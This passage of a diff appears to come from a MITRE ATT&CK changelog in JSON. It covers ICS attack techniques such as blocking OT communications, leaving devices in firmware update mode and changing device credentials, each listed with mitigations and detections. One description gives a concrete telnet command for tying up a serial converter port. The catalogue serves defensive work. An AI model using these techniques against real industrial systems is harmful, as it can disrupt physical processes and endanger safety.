+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between app install/update and subsequent lifecycle or network anomalies."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Strongest app inventory and managed state analytics depend on supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedManagedApps",
+                            "description": "Approved managed app set varies by organization, business unit, and device profile."
+                        },
+                        {
+                            "field": "ExpectedVersionTransitionPolicy",
+                            "description": "Allowed upgrade paths, release rings, and phased rollout patterns vary by environment."
+                        },
+                        {
+                            "field": "AllowedDestinations",
+                            "description": "Expected app destinations, enterprise backends, Apple services, and CDNs differ by app."
+                        },
+                        {
+                            "field": "BackgroundRefreshBaseline",
+                            "description": "Legitimate background activity differs by app category and policy."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close runtime/network activity must be to user action to be considered expected."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for suspicious post-update outbound transfer volume."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-17 17:55:46.302000+00:00\"}}}",
+                    "previous_version": "1.1"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        }
+    },
+    "ics-attack": {
+        "techniques": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Activate Firmware Update Mode",
+                    "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0800",
+                            "external_id": "T0800"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Joe Slowik - Dragos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-04-25 15:16:44.679000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0802: Detection of Activate Firmware Update Mode"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fbb67c2d-37c3-49ee-86e3-bf234cc48ca9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:50:35.776000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Block Communications",
+                    "description": "Operational technology communications occur over serial COM, Ethernet, Wi-Fi, cellular (4G/5G), and satellite mediums. Adversaries may block communications to prevent reporting messages and command messages from reaching their intended target devices disrupting processes, operations, and causing cyber-physical impacts.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)  \n\nAdversaries may block communications by either making modifications to software ([System Firmware](https://attack.mitre.org/techniques/T0857), [Module Firmware](https://attack.mitre.org/techniques/T0839), [Hooking](https://attack.mitre.org/techniques/T0874), and [Rootkit](https://attack.mitre.org/techniques/T0851)) and services ([Service Stop](https://attack.mitre.org/techniques/T0881), [Denial of Service](https://attack.mitre.org/techniques/T0814)) on systems and devices or by positioning themselves between systems and devices and intercepting and blocking the communications such as the case with an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1695",
+                            "external_id": "T1695"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-23 19:52:53.490000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0910: Detection of Block Communications"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6008c1f0-1b68-4614-8f5b-a547436b8855",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:22.891000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Ethernet",
+                    "description": "Adversaries may block access to Ethernet communications to prevent instructions or configurations messages from reaching target systems and devices. Ethernet connections allow for communications between IT and OT systems and devices. Blocking Ethernet communications may also block command and reporting messages.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nAn adversary may block Ethernet communications by disabling network interfaces, [Service Stop](https://attack.mitre.org/techniques/T0881), or conducting an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack and dropping the network traffic.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1695/002",
+                            "external_id": "T1695.002"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-23 19:57:13.444000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0911: Detection of Block Ethernet"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--55e7e5c1-3760-4451-bae0-e79b29f452c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:22.399000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Serial COM",
+                    "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages.\n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1695/001",
+                            "external_id": "T1695.001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-23 19:59:10.079000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0797: Detection of Block Serial COM"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--71f2d49e-65dd-4fb6-a4cc-0d2b19d427fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:23.383000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Wi-Fi",
+                    "description": "Adversaries may block access to Wi-Fi communications to prevent messages from reaching target systems and devices. Wi-Fi connections allow for communications between IT and OT systems and devices. Blocking Wi-Fi communications may also block command and reporting messages.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nAn adversary may block Wi-Fi communications by disabling network interfaces, [Service Stop](https://attack.mitre.org/techniques/T0881), conducting an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack and dropping the network traffic, or by jamming the Wi-Fi signal.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1695/003",
+                            "external_id": "T1695.003"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2026-04-23 19:59:42.404000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0912: Detection of Block Wi-Fi"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--338f4364-2269-4f70-9079-b20384b16628",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:50:34.107000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Block Operational Technology Message",
+                    "description": "Adversaries may block messages between systems and devices in an OT/ICS environment to disrupt processes. Messages typically fall into two categories: (1) reporting messages that contain telemetry data about the current state of systems, devices, and processes and (2) command messages that contain instructions to control systems, devices, and processes. Both types of messages are critical for the proper functioning of industrial control processes and failure of the messages to reach their intended destinations could inhibit response functions or create an unsafe condition that could have physical impacts.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n\nAdversaries may block communications by either making modifications to software ([System Firmware](https://attack.mitre.org/techniques/T0857), [Module Firmware](https://attack.mitre.org/techniques/T0839), [Hooking](https://attack.mitre.org/techniques/T0874), and [Rootkit](https://attack.mitre.org/techniques/T0851)) and services ([Service Stop](https://attack.mitre.org/techniques/T0881), [Denial of Service](https://attack.mitre.org/techniques/T0814)) on systems and devices or by positioning themselves between systems and devices and intercepting and blocking the communications such as the case with an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1691",
+                            "external_id": "T1691"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        },
+                        {
+                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
+                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
+                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2026-04-23 18:49:15.673000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0814: Static Network Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0903: Detection of Block Operational Technology Message"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--15ca2a99-2d3e-457f-b1d7-c52a1d5849c9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:16.029000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Command Message",
+                    "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1691/001",
+                            "external_id": "T1691.001"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        },
+                        {
+                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
+                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
+                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-23 18:50:42.389000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0814: Static Network Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0784: Detection of Block Command Message"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7866bb5f-98ee-45c2-984c-8a328c5176b2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:16.584000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Reporting Message",
+                    "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1691/002",
+                            "external_id": "T1691.002"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        },
+                        {
+                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
+                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
+                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-23 18:52:34.062000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0807: Network Allowlists",
+                            "M0810: Out-of-Band Communications Channel",
+                            "M0814: Static Network Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0789: Detection of Block Reporting Message"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-30 14:04:17.023000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Change Credential",
+                    "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device\u2019s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021) \n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "inhibit-response-function"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0892",
+                            "external_id": "T0892"
+                        },
+                        {
+                            "source_name": "German BAS Lockout Dec 2021",
+                            "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. Retrieved March 30, 2023.",
+                            "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Felix Eberstaller"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2025-04-16 21:26:20.690000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0811: Redundancy of Service",
+                            "M0927: Password Policies",
+                            "M0953: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0771: Detection of Change Credential"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Change Operating Mode",
